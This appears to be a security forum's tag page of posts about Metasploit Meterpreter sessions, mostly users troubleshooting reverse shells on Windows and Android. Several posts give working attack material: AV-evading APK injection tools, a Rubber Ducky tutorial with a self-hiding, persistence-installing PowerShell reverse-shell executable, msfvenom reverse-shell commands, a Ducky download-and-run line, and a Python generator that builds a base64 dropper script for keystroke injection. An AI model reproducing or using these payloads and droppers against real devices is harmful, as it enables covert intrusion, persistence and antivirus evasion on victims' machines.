Showing results for tags 'meterpreter'.

  1. Hello everyone, This weekend I got a little bored and began toying with Android payloads, just to play with a Meterpreter shell and see how it is. Upon doing so, I noticed the payload generated from msfvenom required me to ignore my AV to install. So this sent me down a path to bypass antivirus, which, come to find out, WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom-generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute, and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a Ducky script could auto-download and install the payload, that would make this awesome. Otherwise, you would need a couple of minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way than injecting the same AV-bypassing payload into a legit app? Well, some people had examples online on how to do this, but it required a long process to do it all manually. Why not script it? Well, each app is different, so this can be hit or miss, so I allowed manual pieces for those special apps. The result was apkinjector, which, by utilizing the apkwash technique of AV bypass, is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is that APKTool has issues with certain packages (Facebook, Starbucks, etc.). I have had success injecting into about 70-80% of .apk files. GitHub: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector
  2. Hi, I'm reasonably new to using Metasploit and can create a .apk with a reverse shell without any issues, but when I upload it to my test Android running 8.1, it does not open a connection. It lets me install it but gives no option to open, and when I click the icon, again nothing happens. I have tried signing the apk as well as binding it to an original application, but still nothing. When I bound it to an original application, the app opened and the game worked, but no connection was created. I have given the individual apps the permissions to install from unknown sources too. Can anybody suggest what is wrong? Much appreciated...
  3. Can I run a payload (Meterpreter, Metasploit) on Android with a Rubber Ducky or Bash Bunny over WAN?
  4. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a Ducky script and coded an executable which will achieve the title of this topic. This will make use of the Twin Duck firmware, so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET Framework 4.5, but PCs with Win 8+ will have this by default and loads of applications use it, so the likelihood of a pre-Win 8 PC not having it is fairly low (I might make a native payload later).
     What the executable does:
     - Checks for specific current privileges, e.g. Admin, Admin user group, non-privileged user.
     - Depending on privilege level, either continues execution or attempts to elevate. (If the user is in the admin user group it will display a normal UAC prompt, so the Ducky script we use later can hit 'ALT Y'.)
     - Copies itself and the required DLLs to the default TEMP directory, and sets all of those files to be hidden.
     - Creates a hidden Task Scheduler task which runs the executable on each user logon.
     - Executes the encoded PowerShell payload.
     Why smart privilege checking is important: If a completely non-privileged user were to execute the program and it asked for UAC anyway, then a prompt like this would appear: This is obviously problematic; in this circumstance we would rather our payload run with normal privileges, because non-privileged access is better than no access, right? This is why I have incorporated the privilege escalation into the executable rather than the Ducky script, so this prompt is never displayed and instead we get a normal user-level Meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our Ducky script to hit 'ALT Y' and bam! We can then just use Meterpreter's 'getsystem' command and we're away!
     Tutorial:
     What you'll need:
     - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).
     - Linux-based PC/VM for generating our payload and listening for connections. Preferably Kali Linux, as we will be using S.E.T. (Social Engineering Toolkit) to generate our PowerShell payload.
     - USB Rubber Ducky (with Twin Duck or similar firmware installed).
     - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (unzip it on your Windows PC/VM first).
     Let's start:
     - On the Kali Linux side of things, open S.E.T. by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.
     - You will be presented with various options; hit '1' and then Enter.
     - Again more options; hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then Enter.
     - More options; hit '1' and then Enter.
     - Give it your local IP (or external IP if you want a connection from outside your local network; this would require port forwarding).
     - Give it a port and then say 'yes' when it asks if you want to start the listener.
     - Now type this command (change the path if necessary):
       sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/
     - You have just started a web server on port 80. Navigate there in your Windows PC's web browser with the file name in the path, like so: '192.168.0.XXX/x86_powershell_injection.txt'. You should be faced with this screen:
     - Select all the text and copy it.
     - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:
     - Go to the line with the pre-inserted PowerShell payload (line 64):
     - Replace the text within the double quotes with the payload you got from the web server earlier.
     - Go to the Build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU'; if not, just change them.
     - Navigate to the path it gives at the bottom in the console window to find the DLLs and exe file we need.
     - Plug your Ducky's micro SD card into your PC and copy the files 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' and 'JetBrains.Annotations.dll' to your Ducky drive.
     - Now we need our Ducky payload; here is the code:
       REM Awesome script
       DELAY 500
       GUI R
       DELAY 50
       REM find the drive whose volume name is DUCKY and launch PSExec.exe from it
       STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
       DELAY 50
       ENTER
       DELAY 1500
       REM accept the UAC prompt shown for admin-group users
       ALT Y
       DELAY 1000
       STRING exit
       DELAY 50
       ENTER
       DELAY 50
       STRING exit
       DELAY 50
       ENTER
     - Generate your inject.bin file with an encoder.
     - Copy the inject.bin to your Ducky's drive and there we have it!
     Some caveats:
     - The 'PSExec.exe' file is totally undetected by antiviruses, but if an antivirus wants to scan the file before running it, it may interfere with the Ducky script.
     - Slower PCs may need slightly longer delays in the Ducky script, but hey, just experiment until it works!
     So tell me what you think; feedback is greatly appreciated!
  5. Hey there! I am Luuk, a 14-year-old boy who's very interested in cyber security. When I was little [smaller ;)] I always dreamed about being a cool hacker. About 1 year ago I decided to start, so I made a USB with Kali Linux on it and I learned the basics of Metasploit [Meterpreter payloads]. I also discovered how to hide a virus from a lot of AVs like Windows Defender. I also learned the basic commands of the terminal and working with Armitage. But I have 1 problem ;( Every time I want to start a listener I make the payload like this:
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=<the port of ngrok> -f exe > payload.exe
     So that's done and I wanted to start a listener. I open Metasploit and type:
     use multi/handler
     set payload windows/meterpreter/reverse_tcp
     set lhost 127.0.0.1
     set lport 80
     exploit
     OK, so a few months ago it would say "started reverse handler ........" and it started to listen. Now it says "started reverse handler" and a new line is opened. What!!! What's going on? When I search the job with services it's listening, but when I type run {job number} it says "did you want a ReverseListenerBindAddress? Failed to bind 127.0.0.1, failed to bind 0.0.0.0". So that's my problem. Extra note: I use ngrok for Meterpreter over WAN {I can't port forward for some reason}. It would be great if I could get an answer. Thanks and happy hacking!
  6. I have been trying to get a Meterpreter session over WAN using a reverse TCP attack for a while now and I'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to send the session to my listener on port 4444. I can get a netcat session over WAN so I know the port forwarding is set up correctly, but Meterpreter doesn't seem to be receiving any connections. Any thoughts?
  7. blackcoat
     Meterpreter
     FUD backdoor made with Pwnwinds (.bat format + PowerShell) is not connecting to the Metasploit listener. The backdoor was made by TheFatRat. Connection type: reverse HTTPS. Attacked VirtualBox OS type: Windows 10.
  8. Hello everyone, I am new here; this is my very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into Meterpreter when the victim is not using my IP). However, it turns out that port forwarding isn't possible on IPv6; in fact, it WOULD work if the victim uses IPv6 as well. I haven't confirmed that, anyway (please correct me if I am wrong here). My question is, is there any way to start a session as an IPv6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit with the windows/meterpreter/reverse_tcp payload (also tried reverse_ipv6_tcp). If someone can help me or respond to this thread I will highly appreciate it! Thank you!
  9. Hi guys, does anyone know how I can get shell access using any modern browser (Chrome, IE, Firefox, etc., so that the browser doesn't bitch at me and say I need to upgrade to the latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 and then using the exploit exploit/windows/browser/ms10_002_aurora. But so far I've got nothing. :( No Meterpreter sessions. This is for a presentation, by the way. Can any of you guys suggest a different way? I am desperate. Wait, not really. Just really frustrated. Hope someone can help. Thanks in advance!
  10. Bro, I made a payload in Metasploit using ngrok without port forwarding so that I can go WAN... but in ngrok the port changes every time I open it... so I need to make the payload again and again and send it to the victim... Is there any way I can overcome this?
  11. I'm trying to exploit my rooted Galaxy Core Prime, which is vulnerable to the exploit/unix/x11/x11_keyboard_exec module. I'm having a bit of trouble getting a shell. I've got to the point where a session is created, but when I try to interact with the session to get a shell it just stops and hangs and does nothing. I've tried different payloads but the same thing happens every time. It just says "interacting with session <ID>", and I can't get any further than that. Any tips or help would be appreciated. And I'm also a bit confused on configuring the reverse shell payload: is the LHOST supposed to be my IP or the victim's in a reverse shell? Plus, what is the proper IP and port number for "ReverseListenerBindAddress" and "ReverseListenerBindPort"? Thank you.
  12. Hi!! I get this error when I try to run the record_mic command in a Meterpreter session:
      Error running command record_mic: NoMethodError undefined method 'value' for nil:NilClass
      What am I doing wrong? Thanks!!!
  13. I just created a sample Android backdoor; it's called apkgue.apk. After I run it on my phone (Android) I'm stuck at the next step: the meterpreter > prompt doesn't show. Why? Any help for me? Thanks.
      msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
      [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk
      No platform was selected, choosing Msf::Module::Platform::Android from the payload
      No Arch selected, selecting Arch: dalvik from the payload
      No encoder or badchars specified, outputting raw payload
      Payload size: 8809 bytes
      msf > use exploit/multi/handler
      msf exploit(handler) > set payload android/meterpreter/reverse_tcp
      payload => android/meterpreter/reverse_tcp
      msf exploit(handler) > set lhost 192.168.43.128
      lhost => 192.168.43.128
      msf exploit(handler) > set lport 3344
      lport => 3344
      msf exploit(handler) > show options
      Module options (exploit/multi/handler):
         Name  Current Setting  Required  Description
         ----  ---------------  --------  -----------
      Payload options (android/meterpreter/reverse_tcp):
         Name   Current Setting  Required  Description
         ----   ---------------  --------  -----------
         LHOST  192.168.43.128   yes       The listen address
         LPORT  3344             yes       The listen port
      Exploit target:
         Id  Name
         --  ----
         0   Wildcard Target
      msf exploit(handler) > exploit
      [*] Exploit running as background job 0.
      [*] Started reverse TCP handler on 192.168.43.128:3344
      msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1
      [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  14. Hi! I'm trying to get into a Windows 10 x64 computer on the same LAN as another x86 PC with Kali Linux. Once I finally get into the target PC (W10) and the Meterpreter session is open, the Meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter > command prompt... What am I doing wrong? Thanks!!
  15. I was a little curious about the PrependMigrate option for Meterpreter. I was trying to migrate to iexplore.exe or MicrosoftEdge.exe, but I'm not sure how to set the PrependMigrateProc option when generating my payload. I'm mostly confused on the path for the program I want to migrate to. If I use the program name it just doesn't work. When I use the full path it throws a different error like my syntax is wrong. Any ideas?
      # msfvenom payload options are KEY=value pairs (the post passed "PrependMigrate true" without the "=")
      msfvenom -p windows/meterpreter/reverse_hop_http \
        -e x86/shikata_ga_nai -i 3 \
        PrependMigrate=true \
        PrependMigrateProc="C:\Program Files\Internet Explorer\iexplore.exe" \
        --platform win \
        HOPURL=http://192.168.1.10/hop.php \
        EXTENSIONS=stdapi,priv \
        -f raw -o /root/Desktop/radpayload.raw
  16. Hi, I've been trying to upload a .vbs file to a remote machine in a Meterpreter session without success. This problem also occurs with .exe files, so it's not the .vbs file type not being supported. I've tried this:
      upload root/Desktop/program.vbs c:\\Users\\i7479\\Desktop
      This returns:
      [-] Error running command upload: Errno::ENOENT No such file or directory @ rb_file_s_stat - root/Desktop/program.vbs
      The paths for these files are both correct; it just can't find the program to be uploaded... Does anyone know how to carry this out? Should such a basic command be so tricky to execute? This doesn't work in Armitage (GUI) either, btw...
  17. So I have seen people having issues with downloading a Meterpreter payload and getting it to run from the Ducky. I went for a different approach. I decided to try to modify this script from the wiki (I think Darren did a segment on it) in a different way. Here is what I came up with.
      - Create the exe from msfvenom with the params to connect to the Metasploit handler
      - Encode the exe with base64
      - Edit the encoding to be duckyfied
      - Append the duckyfied encoded exe to met.txt
      - Append last.txt to met.txt
      - Run the Duck encoder to make the inject.bin
      - Place it on the Ducky SD card ... win

      # build the staged x86 payload, avoid NULL bytes, and base64 it (76-column lines)
      msfvenom -a x86 --platform windows \
        -p windows/meterpreter/reverse_tcp \
        LHOST=IP_ADDRESS \
        LPORT=PORT \
        PREPENDMIGRATE=true \
        PREPENDMIGRATEPROC=notepad.exe \
        ReverseConnectRetries=20 \
        -b '\x00' \
        -e x86/shikata_ga_nai \
        -f exe | \
        base64 > bad_exe.txt
      # prefix every base64 line with STRING and follow each one with ENTER
      sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt
      cat last.txt >> met.txt
      java -jar encoder.jar -i met.txt -o inject.bin

      Contents of met.txt:
      REM open an elevated command prompt
      ESCAPE
      CONTROL ESCAPE
      DELAY 400
      STRING cmd
      DELAY 400
      MENU
      DELAY 400
      STRING a
      DELAY 600
      LEFTARROW
      ENTER
      DELAY 400
      REM type the base64 decoder; consecutive STRING lines land on one VBScript line
      STRING copy con c:\decoder.vbs
      ENTER
      STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
      STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
      STRING CreateObject("Scripting.FileSystemObject"):
      ENTER
      STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
      STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
      STRING decodeBase64(base64):
      ENTER
      STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
      STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
      STRING writeBytes(file, bytes):Dim binaryStream:
      ENTER
      STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
      STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
      ENTER
      CTRL z
      ENTER
      REM the STRING/ENTER base64 lines from sed follow this
      STRING copy con c:\bad_exe.txt
      ENTER

      Contents of last.txt:
      CTRL z
      ENTER
      STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe
      ENTER
      STRING c:\bad.exe
      ENTER
      STRING exit
      ENTER
  18. Hi... I have a problem; hope somebody can help me! OK... I have created a reverse TCP DNS payload with msfvenom. Now I want to execute this file by plugging in the USB Rubber Ducky! How do I do this? Do I have to convert my payload with Base64? And if yes, how could I do this? Please help me!
  19. Hey guys, I recently came across an error or "glitch" which involves browsing a remote machine's files in a Meterpreter shell. I noticed that files that have a space or many spaces in their name cannot be opened. The Meterpreter shell returns the following error:
      [-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
      This is especially annoying, as one cannot access obvious locations such as Program Files since there is a space. I have tried using an underscore instead or just omitting the space, with no luck. What do you guys think? Cheers.
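      Post 17's pipeline, and the Base64 question in post 18, as an added example that is not part of either post: a Python generator that produces the same met.txt (base64 the binary, type it onto the target with copy con, decode it there with the post's VBScript), plus a parser that decodes the typed base64 back so the script can be checked before it goes through the encoder, and a keystroke count showing what the approach costs. The file paths c:\decoder.vbs, c:\bad_exe.txt and c:\bad.exe and the elevated-cmd key sequence are taken from post 17; the VBScript is the post's decoder verbatim; SAMPLE_PAYLOAD is constructed data standing in for msfvenom's -f exe output.

```python
"""Build the DuckyScript that types a base64-encoded binary onto a Windows
target and decodes it with a VBScript helper, and parse such a script back.
Added example, not code from the posts above.  Paths, key sequence and the
decoder follow post 17; SAMPLE_PAYLOAD is constructed sample data."""
import base64

DECODER_PATH = r"c:\decoder.vbs"
B64_PATH = r"c:\bad_exe.txt"
EXE_PATH = r"c:\bad.exe"

# Post 17's decoder, one physical VBScript line per entry (the post types
# each with several STRING lines and one ENTER).  MSXML's bin.base64 node
# ignores line breaks in the text, so the typed chunk length is free.
VBS_DECODER_LINES = [
    'Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)'
    ':outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = '
    'CreateObject("Scripting.FileSystemObject"):',
    'set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = '
    'decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):',
    'dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):'
    'EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub '
    'writeBytes(file, bytes):Dim binaryStream:',
    'Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:'
    'binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub',
]

# Post 17's key sequence for an elevated prompt (Start menu, "cmd",
# context menu, "a" for run as administrator, Left+Enter on the UAC dialog).
ELEVATED_CMD = [
    "ESCAPE", "CONTROL ESCAPE", "DELAY 400", "STRING cmd", "DELAY 400", "MENU",
    "DELAY 400", "STRING a", "DELAY 600", "LEFTARROW", "ENTER", "DELAY 400",
]


def copy_con(path, lines):
    """Ducky commands that create `path` on the target with `copy con` and
    end the file with Ctrl-Z.  Lines are typed verbatim, so they must not need
    shell quoting; base64 text and this VBScript contain nothing cmd expands."""
    out = [f"STRING copy con {path}", "ENTER"]
    for line in lines:
        out += [f"STRING {line}", "ENTER"]
    out += ["CTRL z", "ENTER"]
    return out


def base64_chunks(payload, line_len=76):
    """Split the base64 form of `payload` into typed lines.  76 matches the
    default wrapping of GNU base64 that the post's pipeline relies on."""
    if line_len < 1:
        raise ValueError("line_len must be positive")
    b64 = base64.b64encode(payload).decode("ascii")
    return [b64[i:i + line_len] for i in range(0, len(b64), line_len)]


def duckify(payload, line_len=76):
    """Return the complete met.txt: elevated cmd, decoder, base64 file, then
    decode, run and exit (post 17's header + sed output + last.txt)."""
    script = list(ELEVATED_CMD)
    script += copy_con(DECODER_PATH, VBS_DECODER_LINES)
    script += copy_con(B64_PATH, base64_chunks(payload, line_len))
    script += [
        f"STRING cscript {DECODER_PATH} {B64_PATH} {EXE_PATH}", "ENTER",
        f"STRING {EXE_PATH}", "ENTER",
        "STRING exit", "ENTER",
    ]
    return "\n".join(script) + "\n"


def typed_base64_lines(script):
    """The STRING lines typed into the base64 file, as the target receives them."""
    lines = script.splitlines()
    start = lines.index(f"STRING copy con {B64_PATH}") + 2   # skip its ENTER
    end = lines.index("CTRL z", start)
    return [l[len("STRING "):] for l in lines[start:end] if l.startswith("STRING ")]


def extract_payload(script):
    """Decode the typed base64 the way the VBScript does (concatenated text,
    line breaks ignored).  Run this on met.txt before encoding inject.bin."""
    return base64.b64decode("".join(typed_base64_lines(script)), validate=True)


def keystrokes(script):
    """Characters the Ducky has to type (STRING payloads plus one per ENTER):
    the cost of the approach, since a staged exe is tens of kilobytes."""
    n = 0
    for line in script.splitlines():
        if line.startswith("STRING "):
            n += len(line) - len("STRING ")
        elif line == "ENTER":
            n += 1
    return n


# Constructed sample standing in for msfvenom's exe output (1026 bytes).
SAMPLE_PAYLOAD = b"MZ" + bytes(range(256)) * 4

if __name__ == "__main__":
    met = duckify(SAMPLE_PAYLOAD)
    assert extract_payload(met) == SAMPLE_PAYLOAD
    with open("met.txt", "w", newline="\n") as fh:
        fh.write(met)
    print(f"met.txt: {len(typed_base64_lines(met))} base64 lines, {keystrokes(met)} keystrokes")
```

      Feed duckify() the bytes of the msfvenom exe and hand met.txt to the Duck encoder as the post does; extract_payload() is the pre-flight check that the typed text round-trips to the same binary, which catches a truncated or mis-split line before it costs a physical test run.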
  20. Hello... I have a question about the USB Rubber Ducky; hope you can help me! My attack computer is a Raspberry Pi 2 with Raspbian installed. My victim PC is a Windows 10 notebook. I want to get a Meterpreter reverse TCP session to my Raspberry Pi from the victim when I plug my USB Rubber Ducky into the Windows PC. How I proceeded:
      1. I created the "payload.exe" on the Raspberry Pi:
         ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe
      2. I created a listener file and ran it on the Raspberry Pi:
         ~$ sudo nano /home/pi/listener.rc
      To test how things work I saved the "payload.exe" on the victim machine's HDD and ran it as the system administrator. This is what happened on the Pi's screen: So far so good...
      My idea now was to let the USB Rubber Ducky do two things for me after plug-in:
      1. download my "payload.exe" from the internet
      2. install it on the victim PC with admin rights
      So I created an "inject.bin" with the Duck Toolkit encoder. This is the code I used (I changed the download URL to an existing one):
         DELAY 500
         CONTROL ESCAPE
         DELAY 200
         STRING cmd.exe
         DELAY 100
         ENTER
         DELAY 500
         STRING cd %TEMP%
         DELAY 100
         ENTER
         DELAY 100
         REM DownloadFile takes two arguments, the URL and the local path, each in its own quotes; cmd expands %TEMP% before PowerShell sees the line
         STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe','%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe"
         DELAY 100
         ENTER
         DELAY 100
         ALT SPACE
         DELAY 50
         DOWN
         DELAY 50
         DOWN
         DELAY 50
         DOWN
         DELAY 50
         DOWN
         DELAY 50
         DOWN
         DELAY 50
         ENTER
         DELAY 50
         GUI d
      Now, the code runs through without any errors when I plug in the Rubber Ducky. But the problem is that Meterpreter gets no connection from the Ducky! Why doesn't my DuckyScript execute the downloaded file? I don't understand what my fault is! What's wrong? Please help me! Greetings to Darren and the whole Hak5 team!
  21. I am experiencing a slight problem. I used to use Kali Linux 1.1.0 and it was running very well, so I chose to update to Kali Linux 2.0.0. Since my update to Kali 2.0.0, my Metasploit cannot establish a connection through the HTTPS payload. The connection will be accepted and will open, but my PC will say "Session is not valid and will be closed". If the connection gets established and stays open (it sometimes works..), then my commands will not be executed. I have already created a new payload with msfvenom and it doesn't solve my problem. Do you have any suggestions or experiences with this problem, and if yes, can you please help me fix it?
  22. I have a meterpreter shell to a Mark V behind a firewall. I would like to use it to pivot to another box on the network, however I am not sure if the portfwd command is the way to go. It would be nice, for example, to use the portfwd to access an RDP session on a windows box. The pineapple has two interfaces, one wired, one wireless, both are on the local network. I'm using 4444 on the wired interface as the port to call home to the remote network. I have a machine on the local network that is listening on 3389. Anyone have a clear understanding of the portfwd command they could share?
  23. I am kind of a noob on this one. I have this question. I share internet through tethering using my phone, which is connected to the internet through the 3G network. I don't have any other way of accessing the internet, so no cable or wired connections. In the options for setting up an exploit in Metasploit, the LHOST option will not work if I set my public IP. This is because my ISP filters all incoming requests on all ports (the router is located at their site, no access). I would like to know if there is a way I could work around this, preferably a free method. I already know I can use a VPS (Virtual Private Server) but that's expensive. Possible noobie solutions: proxies, VPNs. If this is a solution I would like to know how to set up the LPORT and LHOST. I am sorry if this has a simple answer. Environment: Kali Linux on VMware Workstation ---> hosted on a Windows machine. Please help.
  24. Hello! After reading about the LAN Turtle and watching the videos for it, I have a few questions about the product before I purchase it. Let's take the example that I have successfully installed the LAN Turtle on a targeted computer. I've got a remote SSH connection to the Turtle and a Meterpreter session active. As I've understood it, the LAN Turtle is the only equipment on the network I have access to, and not even the computer it is attached to! So if I want to get access to computers on the network, could I use the Meterpreter session and launch attacks on the computers from the Turtle, get a new Meterpreter into the new computer and work from there? If there is a vulnerable computer on the network, of course. Can the Turtle, which is connected to the network, also visit network folders/disks? Let's say there is a computer/server sharing files and it's accessible by anyone on the network. Can the Turtle access these network folders if they are open to the network the Turtle is connected to, and transfer these files to the SSH server, for example? I'm pretty new to Metasploit but still learning how it works and how it would work out with the LAN Turtle in practice. Also a great tool when I perform pentests for the local companies (FYI: legal and paid work, I don't plan to abuse this if someone were to ask). I mostly do physical testing and assessment, and this would be a really good tool for me as my other co-worker does the software/web part.
  25. I was having firewall issues. I remembered seeing a problem like this addressed in a segment of Metasploit Minute. I wanted to try windows/meterpreter/reverse_hop_http. I set the payload to talk to hop.php that I installed on my local machine. That part I'm pretty sure works. I'm not sure what options I didn't set right for the handler, but it's wanting to stage to example.com rather than the IP I set. I know I'm missing an option but I'm not sure where to set it.
      Edit: No idea what I was thinking there.
      use exploit/multi/handler
      set HOPURL http://192.168.0.184/hop.php
      set payload windows/meterpreter/reverse_hop_http
      exploit -j
      Second try. Nailed it.